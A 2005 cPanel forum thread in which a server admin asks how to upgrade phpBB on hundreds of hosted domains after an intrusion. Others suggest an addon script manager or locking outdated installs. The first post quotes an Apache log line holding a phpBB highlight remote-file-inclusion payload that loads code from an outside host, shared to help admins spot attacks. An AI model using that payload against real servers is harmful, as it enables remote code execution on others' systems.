The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to REALLY upgrade phpBB

Discussion in 'General Discussion' started by derekg, Dec 10, 2005.

1. derekg

derekg Registered

Anyone knows how to upgrade phpBB instalation for ALL DOMAINS hosted on the server?

I have this ongoing problem where some script kiddie runs /usr/local/firewall under user nobody on the server. It's not a firewall, it's really irc bouncer. I have secured my /tmp directory, I have blocked half of Bulgaria and I have upgraded phpBB to the latest version, to no avail.

The PROBLEM is that if you upgrade phpBB through "Addon Scripts" in WHM, it will only upgrade the backend scripts, and will not uprgade any .php files under individual domains. To do that, you need to login into CPanel under EACH domain and run phpBB upgrade from there. If you have more than 500 domains, this won't be something you will enjoy doing.

Does CPanel have a script to upgrade phpBB under ALL domains on the server? I mean upgrade all the .php files under individual domains to the latest version... If so, where is it and is there anything I need to know before I run it?

BTW, for all of you who have the same problem and have not found where it originates from, here is one entry from Apache log file:

62.193.203.251 - - [10/Dec/2005:08:31:06 -0500] "GET /forums/viewtopic.php?p=44&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 12718 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t **** Aleks)"

Just search for "sirh0t" or "Aleks" in your Apache logs.

2. chirpy

chirpy Well-Known Member

Have you installed the WHM > Addon Modules > Addon Script Manager and run that? It providesa you with the option to upgrade phpBB installations done through cPanel.

3. dalem

dalem Well-Known Member
    PartnerNOC

cPanel Access Level:
    DataCenter Provider
    What I do is I have a nifty script that checks for outdated PHP BB send I out a warning if the dont upgrade chown oner to root chmod 000 problem solved not my job to updte client software

#3 dalem, Dec 11, 2005
    Last edited: Dec 11, 2005
  4. faqall

faqall Active Member

care to share your script ^_^

5. bigj

bigj Well-Known Member

The only problem I've had with this script is that you still need to log in and remove the 'install' and 'contribs' directory. Any way to have it remove those automatically?

--
    bigj

6. Jorel

Jorel Well-Known Member